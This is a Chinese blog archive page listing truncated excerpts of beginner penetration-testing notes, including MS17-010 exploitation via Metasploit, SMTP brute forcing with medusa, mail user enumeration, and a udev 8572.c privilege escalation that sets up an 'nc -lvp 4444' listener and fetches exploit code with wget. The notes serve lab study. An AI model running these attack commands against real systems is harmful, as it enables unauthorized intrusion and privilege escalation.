随笔档案「2020年6月」 - f1veseven

ms17-010漏洞

摘要：注:本文章只用于学习和交流使用，请各位读者切勿利用该漏洞做出出格的事情！！！实验环境： kali、win7 启动metasploit控制台调用ms17-010模块设置目标ip 测试目标是否存在该漏洞调用exploit模块设置目标ip 设置payload和本地ip开始执行成功获取shell 维阅读全文

posted @ 2020-06-30 23:46 f1veseven 阅读(154) 评论(0) 推荐(0)

基本防御手段

摘要：暴力破解设置anti-csrf token 验证码设置登录失败次数锁定时间设置过滤特殊字符防止sql注入命令执行过滤黑名单替换、转义关键字设置白名单 CSRF 设置anti-csrf 获取当前用户信息文件包含设置白名单文件包含和文件上传结合文件上传上传文件重命名设置ant 阅读全文

posted @ 2020-06-29 19:00 f1veseven 阅读(129) 评论(0) 推荐(0)

burpsuite基本模块作用

摘要：proxy 拦截网页信息 target 查看网站目录生成网站漏洞报告 spider 爬取网站整个目录 scanner 扫描网页漏洞 intruder 对网页变量更改 repeater 更改请求内容即时返回结果 sequencer 从cookie中获取session分析漏洞 decoder 文本加密解阅读全文

posted @ 2020-06-27 22:12 f1veseven 阅读(244) 评论(0) 推荐(0)

常用的应用服务相关模块和端口

摘要：rpcbind rpcbind 111nfs 2049nmap --script=rpcinfoauxiliary/scanner/misc/sunrpc_portmapper sambasmb 139,445exploit/multi/samba/usermap_script rloginrlog 阅读全文

posted @ 2020-06-26 23:08 f1veseven 阅读(299) 评论(0) 推荐(0)

SMTP暴力破解

摘要：获取信息打开metasploit控制台 >use auxiliary/scanner/smtp/smtp_version >set rhost 192.168.5.141 >show options >exploit 暴力破解 medusa -h 192.168.1.1 -u test -P pa 阅读全文

posted @ 2020-06-25 11:39 f1veseven 阅读(943) 评论(0) 推荐(0)

探测邮箱用户

摘要：telnet telnet 192.168.1.1 25vrfy test@mail.test.lab 存在返回220不存在返回550 metasploit >use auxiliary/scanner/smtp/smtp_enum >show options >set rhosts 192.168 阅读全文

posted @ 2020-06-24 23:29 f1veseven 阅读(171) 评论(0) 推荐(0)

SMTP发送邮件

摘要：创建新用户 sudo adduser test 打开邮箱客户端thunderbird进行下图操作创建完用户后就能发送邮件了阅读全文

posted @ 2020-06-24 22:55 f1veseven 阅读(131) 评论(0) 推荐(0)

SMTP搭建

摘要：添加本地域名解析 sudo gedit /etc/hosts 127.0.0.1 mail .test.lab test sudo gedit /etc/hostname test 重启后用以下命令检测是否生效hostnamehostname -f 安装postfix sudo apt-get in 阅读全文

posted @ 2020-06-24 18:19 f1veseven 阅读(265) 评论(0) 推荐(0)

8572.c提权

摘要：*该操作只能在udev版本低于141下进行 udevadm --version 查看udev版本本机操作 nc -lvp 4444 开启4444端口监听目标机操作 wget 'http://www.exploit-db.com/download/8572' #下载8572.c文件 ggc 857 阅读全文

posted @ 2020-06-24 14:50 f1veseven 阅读(596) 评论(0) 推荐(0)

SSH的Banner信息

摘要：弹回banner信息 nmap: nmap 192.168.1.1 -sV -p 22 netcat: nc 192.168.1.1 22 metasploit: msfconsole use auxiliary/scanner/ssh/ssh_version show options set rh 阅读全文

posted @ 2020-06-23 19:15 f1veseven 阅读(2307) 评论(0) 推荐(0)

Ubuntu安装ssh

摘要：安装ssh服务器终端中输入 sudo apt-get install openssh-server service ssh start service ssh status 安装ssh客户端 sudo apt-get install putty-tools Ubuntu软件中搜索putty安装运阅读全文

posted @ 2020-06-23 18:25 f1veseven 阅读(244) 评论(0) 推荐(0)

FTP漏洞

摘要：FTP简介 21端口C/S模式在应用层用户：RealAdministratoranonymous传输格式：ASCii二进制采用明文传输工具 medusa setookit arpspoof 阅读全文

posted @ 2020-06-23 13:02 f1veseven 阅读(199) 评论(0) 推荐(0)

漏洞扫描

摘要：漏洞扫描工具 Nmap: nmap --script vuln 192.168.1.1 -T4 Nessus:service nessusd start 开启nessus服务https://127.0.0.1:8834 进入页面后设置target开始扫描Metasploit: 21端口ftp漏洞利阅读全文

posted @ 2020-06-22 19:06 f1veseven 阅读(150) 评论(0) 推荐(0)

端口探测

摘要：端口范围(0-65535)2^16tcp/udp 分类周知端口0-1023动态端口49152-65535注册端口1024-49151 探测工具 Nmap: nmap 192.168.1.1 nmap 192.168.1.1 -p 22 --script banner 返回banner nmap - 阅读全文

posted @ 2020-06-22 12:09 f1veseven 阅读(186) 评论(0) 推荐(0)

IP探测

摘要：OSI七层模型 7 应用层 6 表示层 5 会话层 4 传输层 3 网络层 2 数据链路层 1 物理层二层发现 OSI中链路层中协议发现主机，一般是用arp协议无法通过路由发现工具arpingnetdiscover 三层发现 OSI中网络层中的协议进行主机发现，一般是用ICMP协议会被防火墙过滤阅读全文

posted @ 2020-06-18 00:27 f1veseven 阅读(412) 评论(0) 推荐(0)

kali linux基础命令

摘要：更新kali apt update && apt upgrade && apt dist-upgrade 文件文件夹查看 ls -alh-a 查看所有文件和文件夹-l 详细格式查看-h 文件大小用k m为单位文件文件夹操作文件夹:mkdir rmdir文件:touch rm 文件文件夹的移动 m 阅读全文

posted @ 2020-06-17 01:22 f1veseven 阅读(228) 评论(0) 推荐(0)

Centos与Debian的安装命令

摘要：yum install 软件名(安装) apt-get install 软件名 (安装) Centos Debian rpm(安装.rpm的安装包) dpkg(安装.deb的安装包) yum(从yum源中安装) apt-get(从apt-get源中安装) rpm -ivh 软件名(安装) dpkg 阅读全文

posted @ 2020-06-15 11:21 f1veseven 阅读(1558) 评论(0) 推荐(0)

HTML基础

摘要：HTML(Hyper Text Markup Language)是超文本标记语言,网页访问主体框架 <html> <head> <title>hello world</title> </head> <body> hello world </body> </html> 属性 bgcolor 背景颜色阅读全文

posted @ 2020-06-15 00:34 f1veseven 阅读(65) 评论(0) 推荐(0)

基本的SQL语言

摘要：创建创建数据库,创建表 create database test; create table user( id int not null primary key, name varchar(32) not null, password varchar(32) not null); 可以用desc查阅读全文

posted @ 2020-06-13 20:18 f1veseven 阅读(174) 评论(0) 推荐(0)

phpstudy靶场搭建

摘要：安装好phpstudy后重置密码将下载好的sqli-labs源码导入到www目录下进入phpMyAdmin导入sqli-labs目录下的sql-lab.sql文件执行后修改sqli-labs\sql-connections下的db-creds.inc文件 <?php //give your m 阅读全文

posted @ 2020-06-13 17:26 f1veseven 阅读(967) 评论(0) 推荐(0)

Centos7下搭建服务器(apache+mysql+php)

摘要：安装前首先设置好yum源安装apache、mysql、php和其他连接的插件 yum -y install httpd mysql php mysql-server php-mysql 由于centos7下没有mysql安装程序所以在官网中下载 wget http://repo.mysql.com 阅读全文

posted @ 2020-06-12 22:45 f1veseven 阅读(425) 评论(0) 推荐(0)

Centos7设置yum源

摘要：命令dh -f查看光盘挂载的位置 cd /etc/yum.repos.d rm -rf * vim centos.repo 编辑以下内容 [Centos.repo]name=Centos.repobaseurl=file:///mediagpgcheck=0enable=1 保存退出阅读全文

posted @ 2020-06-11 10:16 f1veseven 阅读(470) 评论(0) 推荐(0)

Linux基础

摘要：Linux目录结构: /bin 普通用户命令目录/boot 核心配置文件目录/dev 存储文件目录/etc 系统应用服务配置文件目录/home 用户文件目录/lib 函式库文件目录/media 挂载光盘/存储介质目录/mnt 挂载存储介质目录/opt 安装外部大型程序目录/proc 开机生成进程文件阅读全文

posted @ 2020-06-10 18:21 f1veseven 阅读(145) 评论(0) 推荐(0)

一个服务器中搭建多个站点

摘要：测试环境 win server 2003 1.多个ip 在IP设置中添加多个同一网段下的ip地址，在设置网站时ip地址选择为添加的IP后，可通过多个ip访问网站 2.一个ip多个端口设置网站时修改tcp端口来达到用多个端口访问网站的目的 3.域名安装网站时设置主机头，打开dns服务器管理，创建区阅读全文

posted @ 2020-06-09 16:17 f1veseven 阅读(868) 评论(0) 推荐(0)

简单的windows渗透测试

摘要：测试环境 win xp win server 2003 1.锁定目标机通过arp -a查找arp缓存表，找到ip后进行ping测试看是否连通 2.爆破密码用hydra工具进行爆破 3.硬盘映射进行提权命令net use k: \\192.168.5.129\c$把目标机的c盘映射到本地,在本地阅读全文

posted @ 2020-06-08 23:54 f1veseven 阅读(654) 评论(0) 推荐(0)

一些windows中常用的小知识

摘要：1.较为重要的系统目录及文件 C:\Windows\System32\config\sam 存放用户密码/sam文件C:\Windows\System32\drivers\etc\hosts 解析域名/hosts文件C:\Users\ray\AppData\Roaming\Microsoft\Win 阅读全文

posted @ 2020-06-08 21:44 f1veseven 阅读(245) 评论(0) 推荐(0)

搭建简易的网站(win server 2003 + iis + asp +access)

摘要：1.安装IIS 在win2003中的“开始”找到“管理您的服务器”，开始创建服务器类型添加角色后选择自定义配置，框选中“应用程序服务器(IIS,ASP.NET)，下一步开始安装 2.启动管理器创建网站在“开始”的“管理工具中找到“Internet信息服务(IIS)管理器”，打开后在网站一栏右击创阅读全文

posted @ 2020-06-07 16:53 f1veseven 阅读(823) 评论(0) 推荐(0)

f1veseven

06 2020 档案

公告